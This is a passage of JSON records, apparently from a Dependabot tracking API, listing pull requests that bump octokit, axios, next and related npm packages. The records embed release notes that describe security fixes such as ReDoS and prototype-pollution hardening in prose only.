href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.4.0 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 5.1.0 to 5.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003e5.1.1\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e12a14f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b51ed2766807a5ca59b5ba477762e84171ccca53\"\u003e\u003ccode\u003eb51ed27\u003c/code\u003e\u003c/a\u003e test: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/12a14f03dbfbbdc759c1c20a631b277892da09de\"\u003e\u003ccode\u003e12a14f0\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/dayshift\"\u003e\u003ccode\u003e@​dayshift\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v5.1.0...v5.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/bit10-101010/actions-comment-pull-request/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/bit10-101010/actions-comment-pull-request/pull/7","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bit10-101010%2Factions-comment-pull-request/issues/7","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7/packages"},{"uuid":"4042280527","node_id":"PR_kwDORhO0587I54S-","number":5,"state":"open","title":"Bump @octokit/plugin-paginate-rest from 9.1.5 to 9.2.2 in /github-sdks/js in the npm_and_yarn group across 1 directory","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-08T22:03:24.000Z","updated_at":"2026-03-08T22:03:55.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"9.1.5","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"}],"path":"/github-sdks/js in the npm_and_yarn group across 1 directory","ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the /github-sdks/js directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@octokit/plugin-paginate-rest` from 9.1.5 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.0...v9.2.1\"\u003e9.2.1\u003c/a\u003e (2024-03-01)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e5b84386\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev9.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.0\"\u003e9.2.0\u003c/a\u003e (2024-02-22)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/users\u003c/code\u003e endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/594\"\u003e#594\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e75aeaaf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/5b84386830ebfe873f4ab7e106cc33eec6a2ace7\"\u003e\u003ccode\u003e5b84386\u003c/code\u003e\u003c/a\u003e fix(pkg): pin \u003ccode\u003e@octokit/core\u003c/code\u003e peerDependency to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/599\"\u003e#599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/fa01f94c624b3b67f6ef687c80865773a1c99676\"\u003e\u003ccode\u003efa01f94\u003c/code\u003e\u003c/a\u003e ci(action): update actions/add-to-project action to v0.6.0 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/598\"\u003e#598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/75aeaafae8b52afe744958075d95111f37343093\"\u003e\u003ccode\u003e75aeaaf\u003c/code\u003e\u003c/a\u003e feat: new \u003ccode\u003e/orgs/{org}/organization-roles/{role_id}/teams\u003c/code\u003e and `/orgs/{org}/o...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/54d6bcfef756e5b329d817ce5ad3f92885a00a7d\"\u003e\u003ccode\u003e54d6bcf\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/1bfa2f8d338158db33af812168bbfad9d8af4f00\"\u003e\u003ccode\u003e1bfa2f8\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency npm-run-all2 to v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/eb4a8fe643a368ef3d68f8901d551638230581e1\"\u003e\u003ccode\u003eeb4a8fe\u003c/code\u003e\u003c/a\u003e chore(deps): replace dependency npm-run-all with npm-run-all2 ^5.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/11ef7798c8519e8446a92605d4e4bd2008a42c07\"\u003e\u003ccode\u003e11ef779\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.20.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/2b6cc98c51e0816a2873ea5d6e6b4edb01d2e9b9\"\u003e\u003ccode\u003e2b6cc98\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/d7c9de5bb0366b61666c1270138ce93059c3402a\"\u003e\u003ccode\u003ed7c9de5\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.2.4 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/588\"\u003e#588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.1.5...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@octokit/plugin-paginate-rest\u0026package-manager=npm_and_yarn\u0026previous-version=9.1.5\u0026new-version=9.2.2)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/404CellPhoneRepair/Github-Examples/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/404CellPhoneRepair/Github-Examples/pull/5","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/404CellPhoneRepair%2FGithub-Examples/issues/5","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/5/packages"}],"issue_packages":[{"old_version":"2.21.3","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-05-23T05:42:19.000Z","version_change":"2.21.3 → 14.0.0","issue":{"uuid":"4506998168","node_id":"PR_kwDOIkp-Fs7ekAXp","number":2000,"state":"open","title":"build(deps): bump the npm_and_yarn group across 4 directories with 7 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-23T05:42:19.000Z","updated_at":"2026-05-23T05:42:56.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":7,"packages":[{"name":"axios","old_version":"1.14.0","new_version":"1.15.2","repository_url":"https://github.com/axios/axios"},{"name":"next","old_version":"16.2.2","new_version":"16.2.6","repository_url":"https://github.com/vercel/next.js"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"ws","old_version":"8.20.0","new_version":"8.21.0","repository_url":"https://github.com/websockets/ws"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"5.6.3","new_version":"10.0.9"},{"name":"@octokit/request-error","old_version":"2.1.0","new_version":"7.1.0"},{"name":"next","old_version":"16.2.4","new_version":"16.2.6","repository_url":"https://github.com/vercel/next.js"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 3 updates in the /software-review-platform/frontend directory: [axios](https://github.com/axios/axios), [next](https://github.com/vercel/next.js) and [follow-redirects](https://github.com/follow-redirects/follow-redirects).\nBumps the npm_and_yarn group with 1 update in the /software-review-platform/backend directory: [ws](https://github.com/websockets/ws).\nBumps the npm_and_yarn group with 1 update in the / directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\nBumps the npm_and_yarn group with 1 update in the /frontend directory: [next](https://github.com/vercel/next.js).\n\nUpdates `axios` from 1.14.0 to 1.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.15.1\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eLocation\u003c/code\u003e Request Header Type:\u003c/strong\u003e Adds \u003ccode\u003eLocation\u003c/code\u003e to \u003ccode\u003eCommonRequestHeadersList\u003c/code\u003e for accurate typing of redirect-aware requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7528\"\u003e#7528\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFormData Handling:\u003c/strong\u003e Removes \u003ccode\u003eContent-Type\u003c/code\u003e when no boundary is present on \u003ccode\u003eFormData\u003c/code\u003e fetch requests, supports multi-select fields, cancels \u003ccode\u003erequest.body\u003c/code\u003e instead of the source stream on fetch abort, and fixes a recursion bug in form-data serialisation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7314\"\u003e#7314\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10676\"\u003e#10676\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10702\"\u003e#10702\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10726\"\u003e#10726\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter:\u003c/strong\u003e Handles socket-only request errors without leaking keep-alive listeners. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10576\"\u003e#10576\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProgress Events:\u003c/strong\u003e Clamps \u003ccode\u003eloaded\u003c/code\u003e to \u003ccode\u003etotal\u003c/code\u003e for computable upload/download progress events. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7458\"\u003e#7458\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes:\u003c/strong\u003e Aligns \u003ccode\u003erunWhen\u003c/code\u003e type with the runtime behaviour in \u003ccode\u003eInterceptorManager\u003c/code\u003e and makes response header keys case-insensitive. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7529\"\u003e#7529\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10677\"\u003e#10677\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ebuildFullPath\u003c/code\u003e:\u003c/strong\u003e Uses strict equality in the base/relative URL check. (\u003cstrong\u003e\u003ca 